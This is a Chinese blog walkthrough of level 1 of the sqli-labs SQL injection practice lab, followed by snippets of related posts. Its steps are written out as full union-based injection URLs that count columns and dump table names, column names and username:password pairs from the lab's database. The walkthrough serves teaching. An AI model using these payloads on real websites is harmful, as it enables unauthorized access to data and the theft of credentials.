Sqlilabs-1

最新推荐文章于 2021-06-17 19:24:17 发布
最新推荐文章于 2021-06-17 19:24:17 发布
阅读量219 收藏
点赞数
分类专栏: sqlilabs
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107120773
版权

这是 Sqlilabs 注入练习的第一节:D
http://sqlilabs/Less-1/
aa5c019adb746383ae0da2018f1f989.png

提示我们构造 ID
http://sqlilabs/Less-1/?id=1

构造之后得到:

2dd83293b5c8c9b23ec614933146dc4.png

尝试往 id 后边输入 ’ ,表明可能存在 SQL 注入
http://sqlilabs/Less-1/?id=1'
1.png

可用 #(%27) 或者 --+ 省略后面字符,再次回显正常结果:
2dd83293b5c8c9b23ec614933146dc4.png

此处可以利用 order by,对前面的数据进行排序,观察临界值,临界值就是我们最多能够掌控的。
3 列时回显仍然正常,4 开始报错
http://sqlilabs/Less-1/?id=1' order by 3--+
http://sqlilabs/Less-1/?id=1' order by 4--+
be5ebb340e15362b34f0e194aee0bdb.png

由于可操控前三列,那就在这三列做文章,可结合 union 联合注入,union all 和 union 的区别就是 union all 增加了去重功能。在使用 union 时,当前一个语句为空时就会将后面的内容显示出来,可因此构造注入,注意将 1 改成了 -1
http://sqlilabs/Less-1/?id=-1' union select 1,2,3--+
1593076611(1).png

接下来就可以爆数据库表:
http://sqlilabs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
28bc1e2dc00669997bb435f4938957b.png

爆数据库列:
http://sqlilabs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+
b4050f7d2d04245fbc7da7cfbb97a32.png

爆数据:
http://sqlilabs/Less-1/?id=-1' union select 1,2,(select group_concat(username,0x3a,password) from users) users--+
3fddf0d142bcb07304b4e5458722d94.png

查看源码,可以知道源 SQL 语句为:
s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = sql="SELECT * FROM users WHERE id= sql="SELECTFROMusersWHEREid=‘id’ LIMIT 0,1"
并没有对 id 进行任何过滤,所以一个单引号就引发了数据泄露

:D

CrAcKeR-1
关注
专栏目录
sqlilab第一关
qq_45491497的博客
07-28 2037
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
sqlilabs 1-10关
weixin_48993614的博客
07-11 712
根据提示,第一关是get单引号 第一步,看看页面有没有报错 http://192.168.26.132:86/Less-1/?id=1’ and 1=2–+ 页面直接异常 猜测字段 :http://192.168.26.132:86/Less-1/?id=-1’ order by 3–+ 回显位 :http://192.168.26.132:86/Less-1/?id=-1’ union select 1,2,3–+ 当前用户和数据库 :http://192.168.26.132:86/Less-1/
sqli-lib 1(sqli-lib冲关记录)
qq_55777983的博客
06-17 375
冲关前言 本人是咸鱼,先定个小目标,至少一天冲一关吧。 冲冲冲! 关于sqli-lib的环境搭建可以看我另一篇 搭建sql-libs的环境 sqli-lib1 首先用万能密码 找到了注入点 测试查询有几个字段,先猜一个(剧情需要) 继续加 还可以加 继续加呗 报错了,说明有3个查询字段,接下来查看回显列 回显字段很明显是2和2 其实不用order by 直接用 union select 1 --+ union select 1,2 --+ union select 1,2,3 --+ 来试也行
sqlilabs1-20详细教程
黑白的博客
10-06 8263
声明 学习SQL注入 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show databases;
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Sqli-labs-maste 靶场的下载, phpStudy 下载
最新发布
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
Sqli-labs之Less1-10
Mi1k7ea
04-14 4582
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
sqlilab (1-10)看不懂指南
跳房子的博客
01-18 4093
第一关: 输入id=1'之后页面发生变化,说明可能存在sql注入,接下来输入id=1' -- #(这里 -- 与#都是注释符,不确定那个有用就都写上去了) 将后面的语句注释掉,页面正常回显,说明是单引号闭合注入; 接下来用order by 判断字段数,当输入id=1' order by 4 -- #时页面回显错误,说明有3个字段; 接着用id=123' union select 1,2,3确...
当黑客就入门 SQLi-Labs 1-20 详细攻略
Tuye的博客
07-15 1246
SQLi-Lab 攻略13123
sqli-labs闯关指南 1—10
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一关1.经过语句and 1=2...
sqli-labs 1-65教程
任小海博客
08-19 1万+
导语 做完DVWA感觉还是对sql注入了解不够多,尝试做了一下这个实验。 里面是所有的payload和一些解释。 Less1-35 Less-1 Please input the ID as parameter with numeric value 尝试输入ID=1’ 这是一个字符型注入 Payload : id=1’ Less-2 这是一个数字型注入 Payload : ...
sqli-labs (less1-less4)
Xi4or0uji
07-24 1765
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
Sqlilabs-26
KAKA的博客
07-14 2317
来到了 Sqlilabs 大魔王的第 26 关关卡… 来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗? 在此说下常见的绕过方法有:(本来这应该在 25 关卡就说的,忘了…) 双写绕过 大小写绕过 编码绕过,如:hex || URL 注释符绕过,如:/!select/ 替换:如 and 可替换为 && ,or 可替换为 || 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代 有了上述的神兵利器,那就很
Sqlilabs-18
KAKA的博客
07-09 905
来到了 18 关 18 关同样也是在 UPDATE 上面做手脚,但是限制更加严格,不仅对 username 对 password 也做了 check_input 再看看后台 SQL 语句的构造: insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值